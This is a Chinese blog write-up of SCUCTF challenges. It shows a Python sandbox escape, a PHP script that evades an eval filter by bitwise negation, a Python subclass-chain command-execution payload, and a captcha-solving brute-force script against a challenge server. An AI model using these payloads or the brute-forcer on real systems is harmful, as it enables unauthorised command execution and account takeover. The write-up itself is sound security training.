

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="1c3y">
  <meta name="keywords" content="">
  
    <meta name="description" content="pwnget-mepython沙箱逃逸 :(查看文件 1__import__(&quot;os&quot;).system(&quot;ls&quot;) cat flag 1__import__(&quot;os&quot;).system(&quot;cat flag&quot;)  web入门BP抓包看响应头 shell_revenge123456789101112 &lt;?phpif(i">
<meta property="og:type" content="article">
<meta property="og:title" content="SCUCTF WriteUp">
<meta property="og:url" content="http://example.com/2021/06/04/SCUCTF/index.html">
<meta property="og:site_name" content="Icey&#39;s Blog">
<meta property="og:description" content="pwnget-mepython沙箱逃逸 :(查看文件 1__import__(&quot;os&quot;).system(&quot;ls&quot;) cat flag 1__import__(&quot;os&quot;).system(&quot;cat flag&quot;)  web入门BP抓包看响应头 shell_revenge123456789101112 &lt;?phpif(i">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/06/05/LaSkuTB4YsUyK3q.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/BMxvN2h6idbS7FD.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/ewjBFDIaUXgJWkE.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/ZRIGuU58OpnAWeC.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/tFSkxnciQV714oP.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/dpz36vuSCEKIQPw.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/aipALBRZgzCrNJD.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/ZKw1gVXB5pAP9OW.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/b4X9amMqnFkrTfl.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/JP5H9FL231RdVcy.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/2NeOjFZ1cbkVLJI.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/7gcFL3Z2daxMQJf.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/LhHCoDUjMcQfqnT.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/VFaIo3SRkmMc7C6.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/T6c9gvlquaYfQyr.png">
<meta property="og:image" content="https://i.loli.net/2021/06/05/OuvxJmTQER3W68h.png">
<meta property="article:published_time" content="2021-06-04T14:28:00.000Z">
<meta property="article:modified_time" content="2022-03-17T14:55:45.065Z">
<meta property="article:author" content="1c3y">
<meta property="article:tag" content="SCU">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://i.loli.net/2021/06/05/LaSkuTB4YsUyK3q.png">
  
  
  <title>SCUCTF WriteUp - Icey&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/agate.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Icey's Blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Icey&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="SCUCTF WriteUp">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-06-04 22:28" pubdate>
        2021年6月4日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.6k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      31 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">SCUCTF WriteUp</h1>
            
            <div class="markdown-body">
              <h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="get-me"><a href="#get-me" class="headerlink" title="get-me"></a>get-me</h2><p>python沙箱逃逸 :(<br><img src="https://i.loli.net/2021/06/05/LaSkuTB4YsUyK3q.png" srcset="/img/loading.gif" lazyload><br>查看文件</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-built_in">__import__</span>(<span class="hljs-string">&quot;os&quot;</span>).system(<span class="hljs-string">&quot;ls&quot;</span>)<br></code></pre></div></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/06/05/BMxvN2h6idbS7FD.png" srcset="/img/loading.gif" lazyload><br>cat flag</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-built_in">__import__</span>(<span class="hljs-string">&quot;os&quot;</span>).system(<span class="hljs-string">&quot;cat flag&quot;</span>)<br></code></pre></div></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/06/05/ewjBFDIaUXgJWkE.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="入门"><a href="#入门" class="headerlink" title="入门"></a>入门</h2><p>BP抓包看响应头<br><img src="https://i.loli.net/2021/06/05/ZRIGuU58OpnAWeC.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="shell-revenge"><a href="#shell-revenge" class="headerlink" title="shell_revenge"></a>shell_revenge</h2><figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;eval&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$eval</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;eval&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">&#x27;/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\&#123;|\&#125;|\&amp;|\-/i&#x27;</span>, <span class="hljs-variable">$eval</span>))&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-string">&quot;<span class="hljs-subst">$eval</span>&quot;</span>);<br>    &#125;<span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;hacker??&quot;</span>);<br>    &#125;<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    highlight_file(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span> <br></code></pre></div></td></tr></table></figure>
<p>过滤了数字和字母，以及异或、或、与符号、[]、{}等，但是没有过滤按位取反符号~，可以将传入参数按位取反再url编码处理。<br>脚本如下：</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>fwrite(STDOUT,<span class="hljs-string">&#x27;[+]your function: &#x27;</span>);<br><span class="hljs-variable">$system</span>=str_replace(<span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;\r\n&quot;</span>, <span class="hljs-string">&quot;\r&quot;</span>, <span class="hljs-string">&quot;\n&quot;</span>), <span class="hljs-string">&quot;&quot;</span>, fgets(STDIN));<br>fwrite(STDOUT,<span class="hljs-string">&#x27;[+]your command: &#x27;</span>);<br><span class="hljs-variable">$command</span>=str_replace(<span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;\r\n&quot;</span>, <span class="hljs-string">&quot;\r&quot;</span>, <span class="hljs-string">&quot;\n&quot;</span>), <span class="hljs-string">&quot;&quot;</span>, fgets(STDIN));<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;[*] (~&#x27;</span>.urlencode(~<span class="hljs-variable">$system</span>).<span class="hljs-string">&#x27;)(~&#x27;</span>.urlencode(~<span class="hljs-variable">$command</span>).<span class="hljs-string">&#x27;);&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>
<p>先system(ls /)查看根目录，再system(cat /flag)<br><img src="https://i.loli.net/2021/06/05/tFSkxnciQV714oP.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="shell"><a href="#shell" class="headerlink" title="shell"></a>shell</h2><p>解法同上</p>
<h2 id="fastapi"><a href="#fastapi" class="headerlink" title="fastapi"></a>fastapi</h2><p>本题与ctfshow1024的fastapi一样<br>访问/docs进入交互式文档<br><img src="https://i.loli.net/2021/06/05/dpz36vuSCEKIQPw.png" srcset="/img/loading.gif" lazyload><br>选择post，提示传入evval<br><img src="https://i.loli.net/2021/06/05/aipALBRZgzCrNJD.png" srcset="/img/loading.gif" lazyload><br>学习了网上相关题解后，发现可以使用如下payload实现命令执行,先查看根目录：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-built_in">str</span>([].__class__.__base__.__subclasses__()[<span class="hljs-number">189</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;__imp&#x27;</span>+<span class="hljs-string">&#x27;ort__&#x27;</span>](<span class="hljs-string">&#x27;os&#x27;</span>).__dict__[<span class="hljs-string">&#x27;pop&#x27;</span>+<span class="hljs-string">&#x27;en&#x27;</span>](<span class="hljs-string">&#x27;ls /&#x27;</span>).read())<br></code></pre></div></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/06/05/ZKw1gVXB5pAP9OW.png" srcset="/img/loading.gif" lazyload><br>再cat flag</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-built_in">str</span>([].__class__.__base__.__subclasses__()[<span class="hljs-number">189</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;__imp&#x27;</span>+<span class="hljs-string">&#x27;ort__&#x27;</span>](<span class="hljs-string">&#x27;os&#x27;</span>).__dict__[<span class="hljs-string">&#x27;pop&#x27;</span>+<span class="hljs-string">&#x27;en&#x27;</span>](<span class="hljs-string">&#x27;cat /f10g&#x27;</span>).read())<br></code></pre></div></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/06/05/b4X9amMqnFkrTfl.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="奇怪的验证码"><a href="#奇怪的验证码" class="headerlink" title="奇怪的验证码"></a>奇怪的验证码</h2><p>打开是个登录界面<br><img src="https://i.loli.net/2021/06/05/JP5H9FL231RdVcy.png" srcset="/img/loading.gif" lazyload><br>用户名是admin，密码是4位数字，还需要输入验证码<br>由于网页是js加载的，不是静态页面，而python request模块无法获得js加载的网页数据，所以验证码无法直接从返回的源代码中获得<br>先F12查看网络，发现每次网页刷新都会向captcha.php发送请求：<br><img src="https://i.loli.net/2021/06/05/2NeOjFZ1cbkVLJI.png" srcset="/img/loading.gif" lazyload><br>再看下源码：</p>
<figure class="highlight js"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs js"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">refreshcaptcha</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>&#123;<br>  $(<span class="hljs-string">&quot;#expression&quot;</span>).html(<span class="hljs-string">&#x27;arithmetic expression: refreshing....&#x27;</span>);<br>  $.ajax(&#123;<span class="hljs-attr">url</span>:<span class="hljs-string">&quot;captcha.php&quot;</span>,<span class="hljs-attr">success</span>:<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">result</span>)</span>&#123;<br>        $(<span class="hljs-string">&quot;#expression&quot;</span>).html(<span class="hljs-string">&#x27;arithmetic expression:&#x27;</span>+result);<br>    &#125;&#125;);<br>&#125;<br></code></pre></div></td></tr></table></figure>
<p>可以知道每次页面加载前都会先获取captcha.php中的表达式，再加载新的login.php<br>BP抓包验证一下，在我们放掉第一个请求login.php的包后，紧接着就是请求第二次captcha.php的包：<br><img src="https://i.loli.net/2021/06/05/7gcFL3Z2daxMQJf.png" srcset="/img/loading.gif" lazyload><br>接下来就可以写脚本了：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> time <span class="hljs-keyword">import</span> sleep<br><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&#x27;http://42.193.53.250:18850/captcha.php&#x27;</span><br>login = <span class="hljs-string">&#x27;http://42.193.53.250:18850/login.php&#x27;</span><br>cookie = &#123;<span class="hljs-string">&#x27;PHPSESSID&#x27;</span>:<span class="hljs-string">&#x27;28195f48fc7ee61d3f419c74e41a5f7e&#x27;</span>&#125;<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10000</span>):<br>    password = <span class="hljs-built_in">str</span>(i).rjust(<span class="hljs-number">4</span>, <span class="hljs-string">&#x27;0&#x27;</span>)<br>    <span class="hljs-comment"># print(password)</span><br>    expression = requests.get(url, cookies=cookie).text<br><br>    <span class="hljs-keyword">while</span> <span class="hljs-string">&quot;__import__&quot;</span> <span class="hljs-keyword">in</span> expression:  <span class="hljs-comment"># 靶机上留了后门，有时返回的不是表达式，而是弹出计算器的代码，那就再重传，直到获得合法的表达式</span><br>        expression = requests.get(url, cookies=cookie).text<br><br>    captcha = <span class="hljs-built_in">str</span>(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">eval</span>(expression)))<br><br>    data = &#123;<span class="hljs-string">&#x27;username&#x27;</span>: <span class="hljs-string">&#x27;admin&#x27;</span>, <span class="hljs-string">&#x27;password&#x27;</span>: password, <span class="hljs-string">&#x27;captcha&#x27;</span>: captcha, <span class="hljs-string">&#x27;objectType&#x27;</span>: <span class="hljs-string">&#x27;Window&#x27;</span>&#125;<br>    response = requests.post(login, data=data, cookies=cookie).text<br>    print(<span class="hljs-string">f&#x27;[+] try <span class="hljs-subst">&#123;i&#125;</span> times: &#x27;</span>, end=<span class="hljs-string">&#x27;&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;Wrong username or password&#x27;</span> <span class="hljs-keyword">in</span> response:<br>        print(<span class="hljs-string">&#x27;Wrong username or password&#x27;</span>)<br>    <span class="hljs-keyword">elif</span> <span class="hljs-string">&quot;Verify code wrong or expired!Intrusion detected!password got reset!&quot;</span> <span class="hljs-keyword">in</span> response:<br>        print(<span class="hljs-string">&quot;Verify code wrong or expired!Intrusion detected!password got reset!&quot;</span>)<br>        print(expression)<br>    <span class="hljs-keyword">else</span>:<br>        print(response)<br>        print(<span class="hljs-string">&#x27;[*] password: &#x27;</span>, password)<br>        <span class="hljs-keyword">break</span><br></code></pre></div></td></tr></table></figure>
<p>值得注意的是，如果不对返回的验证码表达式进行检查的话，会经常弹出计算器来：<br><img src="https://i.loli.net/2021/06/05/LhHCoDUjMcQfqnT.png" srcset="/img/loading.gif" lazyload><br>原因在于这是返回的不是算术表达式，而是弹出计算器的代码：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;os&#x27;</span>).system(<span class="hljs-string">&#x27;calc;mate-calc;gnome-calculator;open /System/Applications/Calculator.app&#x27;</span>)<br></code></pre></div></td></tr></table></figure>
<p>在我们使用eval执行表达式时就出现了弹窗，这就是自己造成的远程执行漏洞吧XD<br>进行爆破后得到密码：<br><img src="https://i.loli.net/2021/06/05/VFaIo3SRkmMc7C6.png" srcset="/img/loading.gif" lazyload><br>登录后获得flag:<br><img src="https://i.loli.net/2021/06/05/T6c9gvlquaYfQyr.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h1><h2 id="RE1-ex-fps"><a href="#RE1-ex-fps" class="headerlink" title="[RE1]ex_fps"></a>[RE1]ex_fps</h2><p>是个unity制作的游戏，打满100分就可以拿flag<br>不过可以用ILSpy反编译\assets\bin\Data\Managed目录下的Assembly-Csharp.dll文件，直接就有flag<br><img src="https://i.loli.net/2021/06/05/OuvxJmTQER3W68h.png" srcset="/img/loading.gif" lazyload></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/SCU/">SCU</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/07/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E6%80%BB%E7%BB%93/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">计算机网络总结</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/05/01/web1%E6%B8%97%E9%80%8F%E8%AE%B0%E5%BD%95/">
                        <span class="hidden-mobile">web1渗透记录</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
